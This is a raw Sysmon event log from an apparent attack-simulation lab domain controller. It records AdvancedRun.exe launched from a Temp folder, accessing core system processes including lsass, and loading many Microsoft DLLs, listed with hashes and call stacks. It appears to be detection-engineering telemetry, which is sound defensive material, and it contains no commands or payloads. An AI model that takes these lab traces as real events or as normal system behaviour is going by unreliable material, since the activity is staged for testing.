20:08:57.645{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067416Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.645{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067415Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.644{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004067414Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.644{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004067413Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.643{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067412Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.639{834264DD-DAE4-61EA-0C00-000000002702}6523980C:\Windows\system32\lsass.exe{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004067411Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.628{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067410Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.626{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067409Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.626{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067408Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.626{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067407Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.625{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004067406Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.623{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067405Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.621{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067404Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.617{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067403Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.614{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.613{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.611{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.611{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.611{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.611{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.610{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.608{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.606{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.606{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.606{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft 
Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.606{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.605{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.605{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.605{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.605{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.603{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.602{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User 
Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.600{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.597{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.596{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004067382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.596{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.595{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067380Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.595{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 